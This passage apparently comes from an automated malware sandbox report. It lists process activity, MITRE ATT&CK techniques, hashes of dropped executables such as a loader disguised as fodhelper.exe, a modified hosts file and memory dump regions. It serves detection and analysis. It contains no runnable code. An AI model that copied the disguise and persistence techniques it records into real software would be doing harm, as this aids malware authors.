PID:2792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2660

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2376

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2360

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2068

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3884
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2180 -ip 2180
  2⤵
  PID:2572
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3960 -ip 3960
  2⤵
  PID:1460
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 480 -p 4232 -ip 4232
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4968
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 528 -p 3244 -ip 3244
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4944
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 608 -p 4968 -ip 4968
  2⤵
  PID:1080
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 580 -p 3396 -ip 3396
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:1384
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 628 -p 2120 -ip 2120
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:3212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3380

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4436

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3396
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3396 -s 484
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:212

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2120
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2120 -s 484
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:5028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1792.tmp.csv

Filesize
36KB

MD5
ae76098c6d5b7520038e0401fd75622f

SHA1
f37f6872cd6575b4d56e860bcd52dee1bbdfe32f

SHA256
d293c67cc99a7f2a04256c490e8029feda2c6e5f28ae126142266ed8ac7ed211

SHA512
0820cddadc1bcfe6bf59a98280f135acdbee7c400dffdbb3573f26e67ff869908ee61bb5e04fa672871691a08ec034d29e15db0501a013cfcf091fd426f4179c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER184F.tmp.txt

Filesize
13KB

MD5
d1dd6149957a50763ee4d6c9ade52bbe

SHA1
430e19e5bd828ca7af11505278ce5500f631c841

SHA256
0c4606f90d9ad821bab319513c61eed7bad8f7a8579e12a008abecf5445d2093

SHA512
72b135551c4fdb4120855527b577ff78b661d9b6d5a4ff1bd8a1f78662bb5417810f5e68d30442c5597a814de2ce242caa80443bc400f2fecf3335790a6aaf37

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CA5.tmp.csv

Filesize
36KB

MD5
b6d0f8b27df7487813a5d7d66c9ba405

SHA1
2e98ff96a51954ae889c084d670d8a3600a9ecdc

SHA256
c20cec39d80032c8fb22b30c0f05b4072ef43a9f02ac3013692561cfc4d5709e

SHA512
943dbf03a3048d4de6ca54e66bfaf96bdfcf7869af42399e5ca5ac41405e360f4efc87bfbfcbd3409a8eaf8d065ed9e124b881cf9ced4ea81ac6f33dd45eab8f

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CE5.tmp.txt

Filesize
13KB

MD5
a0b0baca1685a39661be3c60b537e2e4

SHA1
a863e289c2cd9952bc26cf7a22480a5ba3554c48

SHA256
5081cdc7bda34f8530a6d138cbdfb3eaf36bd53676a8ea3d235bc9ca29b81a61

SHA512
0c162a1829cbe98f0669003e4884de422cfb738c2c7c5aee3520334945aee169e40543dd653f681c0ed5780831b3827b6b8fbb333a45dbd18d54880a8073f68b

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC557.tmp.csv

Filesize
37KB

MD5
51cc60e8f5fc7a45a7b4eeee5696585a

SHA1
9ea2628afed1998a86762705f66d5a0c48b38ae9

SHA256
1606904b4adfecd05b69395315f2696cec22ff501ee588577782944d6c79f9c6

SHA512
aabd1e4d3e0480f179a4e33f8e4f80223e7a9bad19eb8b8b0f80967ce8589972fadf4af1429dd74e133493999e3933428c619751ca36e0327b0a41316ca70e97

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC568.tmp.csv

Filesize
37KB

MD5
f78f951a7aa0393a5fe67e2da91b24e2

SHA1
61272307aba4375717ca811973d37fe109be5665

SHA256
0d25387d905b9c4bf8d61c6dee72932fb7f8b74d1e9de94b0207c8321cc63bea

SHA512
6f8a85a5e00cec95ba1abccbf80b0a67125aa0e3a76bd6cd3ed08c6bcac5302f46d008fbea75d232f2edbf8b5ef82d91e21c65b0f7a7499987a2b12698518f6b

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5A8.tmp.txt

Filesize
13KB

MD5
fc1803b8c32ee25c1cd34c30bec1bf51

SHA1
08b44b2995d52eb201bee1fc5b442b6e7ee3b972

SHA256
83f66bc1a45410bbd5c58f9296aefa905f707076703bb0b8e8a9af1bd7b452ea

SHA512
94b65c73c8d44125886f551fe3812246d672bc2e024b6906d86cb2eb50bd4062265f8bcc6a41d93a0b19cfa888c775773aac2b85a6ba37b84ecd292af9ff4cbb

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5A9.tmp.txt

Filesize
13KB

MD5
696f64881edc76300cf39fa91e8600d8

SHA1
585adc41ffa10323594d4a8cc0817a5fedd3aac1

SHA256
1ab98986f663abda4f9c7d6f9f7d2a8cb6c6a8626efeee4b791380a87746fa4d

SHA512
199623b1d13f86bd4687ebe05ed328b0b273ef2a8e5716df3f15eb666c4013eee81752624f400df8eabe4eaabe17a029781f9e12405edb2881e570d4331018aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
11529dff888a69eb5c595b1dce6c8d28

SHA1
f278be199c42ac2c5b1193c147d730ca7439f869

SHA256
8c2257c4de23cb323fdff452937901ae40c10fc23c6e4486e755887f5c48b84d

SHA512
61d72c45617c2af55e3a90cb64716a1d0a8da694e77d3db0cf9230e4ca6d6504b1fe24e0e07d585557407eaa1ed539c506a77a67f7e33a318babc1ef06641f39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c697637a9b17f577fccd7e83a5495810

SHA1
04e6054584786b88994b0e0a871562227fe2a435

SHA256
54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164

SHA512
66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk

Filesize
8KB

MD5
90881b07c7af1bf44e62290ee1323384

SHA1
260110b09048d817a50415a0c951f84538143926

SHA256
2987a1fa54af515b413cf5ec848387eb77a0fea5e294492bcc84ad0ed3e1d875

SHA512
eeefa21a1c6c402c674d734e55403280a4c971128037459baf5884e2cfd764758e7fa45820ac9e862b3b8d05981faa5b89bbf355d75d27633dbe96058fce6d6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log

Filesize
512KB

MD5
61a33967c1c1b8fc9568008fe3cd0066

SHA1
4d78750e2d074162c8a7d160c567f1ddb20b9ddc

SHA256
d42afb103fce7704be55754d352eca878a237f9760af4604a16bd0e5c09de1c0

SHA512
0a7b5403f5fbd0b23b47679ae35255700d503add93d055d489b6908d2fa8b2b0a29c624e21681b6573ae2afd468f19e375b8b6263c03710abe936329d253ecbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

Filesize
14.0MB

MD5
fe18c97c4c7d1c9c34c8070dd22130d9

SHA1
0063e4865f6a8cef0d45bebc9e917fccc1c81e85

SHA256
3b3a1400a4b5ef2516745ff696949bef8d086e593c178eabf753b6b88f4b5117

SHA512
028cad9fa50045fcfd6c3f7721f8ec60359039d7105185c88dcb67811db44177e156c052173da24cc4140a1703496f64b9a572f607567120aee59dd113a58625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

Filesize
16KB

MD5
832bd934dccfc69b62f8a077ec9d3a7e

SHA1
e374096cf56bd307ca41b5f88a27995e01f58b60

SHA256
a059a6fa4c84b2124204f39ba79c4f68b4f31fca65c624ec7ead489afb0ab984

SHA512
69bbdfece0f5472fd4bc16ab5f6f097e7b79abb406f110846becc5b7b37f753488f8e6b0cdfa571057cad7395a8cca682511dd84a6ae3f27022ec5dbef474ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
674KB

MD5
e479ecb1802253a4c94767c8af306baf

SHA1
846bb5d88b91b8aa17bdb58eaf246b10e6586402

SHA256
b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

SHA512
b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
674KB

MD5
e479ecb1802253a4c94767c8af306baf

SHA1
846bb5d88b91b8aa17bdb58eaf246b10e6586402

SHA256
b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

SHA512
b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
memory/432-301-0x00000203750D0000-0x00000203750F7000-memory.dmp

Filesize
156KB

Download
memory/432-239-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/596-294-0x000001E36D8A0000-0x000001E36D8C1000-memory.dmp

Filesize
132KB

Download
memory/596-236-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/596-296-0x000001E36D8D0000-0x000001E36D8F7000-memory.dmp

Filesize
156KB

Download
memory/652-298-0x000001951C650000-0x000001951C677000-memory.dmp

Filesize
156KB

Download
memory/652-238-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/740-226-0x00007FF9DBF90000-0x00007FF9DC04E000-memory.dmp

Filesize
760KB

Download
memory/740-234-0x00007FF9DC090000-0x00007FF9DC285000-memory.dmp

Filesize
2.0MB

Download
memory/740-223-0x00007FF9DC090000-0x00007FF9DC285000-memory.dmp

Filesize
2.0MB

Download
memory/740-224-0x00007FF9DBF90000-0x00007FF9DC04E000-memory.dmp

Filesize
760KB

Download
memory/740-225-0x00007FF9DC090000-0x00007FF9DC285000-memory.dmp

Filesize
2.0MB

Download
memory/740-233-0x00007FF9BDF90000-0x00007FF9BEA51000-memory.dmp

Filesize
10.8MB

Download
memory/740-235-0x00007FF9DBF90000-0x00007FF9DC04E000-memory.dmp

Filesize
760KB

Download
memory/740-220-0x00007FF9BDF90000-0x00007FF9BEA51000-memory.dmp

Filesize
10.8MB

Download
memory/808-244-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/936-299-0x00000272EFBB0000-0x00000272EFBD7000-memory.dmp

Filesize
156KB

Download
memory/936-240-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1004-300-0x0000028E3CDD0000-0x0000028E3CDF7000-memory.dmp

Filesize
156KB

Download
memory/1004-237-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1040-245-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1060-242-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1060-303-0x0000023748E60000-0x0000023748E87000-memory.dmp

Filesize
156KB

Download
memory/1160-243-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1160-304-0x000001F0996E0000-0x000001F099707000-memory.dmp

Filesize
156KB

Download
memory/1192-246-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1208-247-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1236-248-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1364-249-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1392-250-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1408-251-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1420-252-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1504-253-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1540-255-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1624-254-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1648-256-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1664-257-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1784-258-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1808-259-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1856-216-0x0000028163E49000-0x0000028163E4F000-memory.dmp

Filesize
24KB

Download
memory/1856-215-0x00007FF9BD1B0000-0x00007FF9BDC71000-memory.dmp

Filesize
10.8MB

Download
memory/1856-208-0x00007FF9BD1B0000-0x00007FF9BDC71000-memory.dmp

Filesize
10.8MB

Download
memory/1912-261-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1920-266-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1944-260-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/1960-263-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2032-262-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2068-264-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2252-265-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2360-267-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2376-268-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2420-279-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2476-269-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2536-270-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2544-271-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2648-272-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2660-273-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2700-274-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2736-199-0x00007FF9BD210000-0x00007FF9BDCD1000-memory.dmp

Filesize
10.8MB

Download
memory/2736-182-0x0000024F306B0000-0x0000024F306D2000-memory.dmp

Filesize
136KB

Download
memory/2736-197-0x0000024F316D0000-0x0000024F316D6000-memory.dmp

Filesize
24KB

Download
memory/2736-188-0x0000024F306F0000-0x0000024F306FA000-memory.dmp

Filesize
40KB

Download
memory/2736-192-0x0000024F316E0000-0x0000024F316FC000-memory.dmp

Filesize
112KB

Download
memory/2736-186-0x0000024F31490000-0x0000024F314AC000-memory.dmp

Filesize
112KB

Download
memory/2736-185-0x00007FF9BD210000-0x00007FF9BDCD1000-memory.dmp

Filesize
10.8MB

Download
memory/2736-196-0x0000024F316C0000-0x0000024F316C8000-memory.dmp

Filesize
32KB

Download
memory/2736-193-0x0000024F30700000-0x0000024F3070A000-memory.dmp

Filesize
40KB

Download
memory/2736-194-0x0000024F31700000-0x0000024F3171A000-memory.dmp

Filesize
104KB

Download
memory/2736-198-0x0000024F31720000-0x0000024F3172A000-memory.dmp

Filesize
40KB

Download
memory/2756-275-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2772-276-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/2792-277-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/3020-278-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/3132-133-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3132-139-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3408-280-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/3612-230-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/3612-241-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/3612-297-0x00007FF9DC090000-0x00007FF9DC285000-memory.dmp

Filesize
2.0MB

Download
memory/3612-232-0x00007FF9DBF90000-0x00007FF9DC04E000-memory.dmp

Filesize
760KB

Download
memory/3612-231-0x00007FF9DC090000-0x00007FF9DC285000-memory.dmp

Filesize
2.0MB

Download
memory/3612-227-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/3660-170-0x0000000005E00000-0x0000000005E0A000-memory.dmp

Filesize
40KB

Download
memory/3660-166-0x0000000004FA0000-0x0000000005032000-memory.dmp

Filesize
584KB

Download
memory/3660-162-0x00000000005C0000-0x000000000072C000-memory.dmp

Filesize
1.4MB

Download
memory/3832-281-0x00007FF99C110000-0x00007FF99C120000-memory.dmp

Filesize
64KB

Download
memory/4288-219-0x0000000007170000-0x00000000071C0000-memory.dmp

Filesize
320KB

Download
memory/4288-191-0x00000000056D0000-0x000000000570C000-memory.dmp

Filesize
240KB

Download
memory/4288-213-0x0000000005A50000-0x0000000005AC6000-memory.dmp

Filesize
472KB

Download
memory/4288-177-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4288-214-0x0000000005C10000-0x0000000005C2E000-memory.dmp

Filesize
120KB

Download
memory/4288-221-0x0000000007390000-0x0000000007552000-memory.dmp

Filesize
1.8MB

Download
memory/4288-222-0x0000000007A90000-0x0000000007FBC000-memory.dmp

Filesize
5.2MB

Download
memory/4288-187-0x0000000005C30000-0x0000000006248000-memory.dmp

Filesize
6.1MB

Download
memory/4288-189-0x0000000005670000-0x0000000005682000-memory.dmp

Filesize
72KB

Download
memory/4288-190-0x00000000057A0000-0x00000000058AA000-memory.dmp

Filesize
1.0MB

Download
memory/4512-195-0x00000000026E6000-0x0000000002823000-memory.dmp

Filesize
1.2MB

Download
memory/4512-175-0x00000000021D7000-0x00000000026DB000-memory.dmp

Filesize
5.0MB

Download
memory/4512-174-0x00000000026E6000-0x0000000002823000-memory.dmp

Filesize
1.2MB

Download
memory/4512-173-0x00000000021D7000-0x00000000026DB000-memory.dmp

Filesize
5.0MB

Download
memory/4992-146-0x0000000005B60000-0x0000000005B7E000-memory.dmp

Filesize
120KB

Download
memory/4992-145-0x0000000005500000-0x0000000005566000-memory.dmp

Filesize
408KB

Download
memory/4992-157-0x0000000007220000-0x0000000007242000-memory.dmp

Filesize
136KB

Download
memory/4992-153-0x0000000007140000-0x00000000071D6000-memory.dmp

Filesize
600KB

Download
memory/4992-152-0x0000000006EF0000-0x0000000006EFA000-memory.dmp

Filesize
40KB

Download
memory/4992-151-0x0000000006E80000-0x0000000006E9A000-memory.dmp

Filesize
104KB

Download
memory/4992-150-0x00000000074C0000-0x0000000007B3A000-memory.dmp

Filesize
6.5MB

Download
memory/4992-149-0x0000000006110000-0x000000000612E000-memory.dmp

Filesize
120KB

Download
memory/4992-148-0x0000000074520000-0x000000007456C000-memory.dmp

Filesize
304KB

Download
memory/4992-144-0x0000000005490000-0x00000000054F6000-memory.dmp

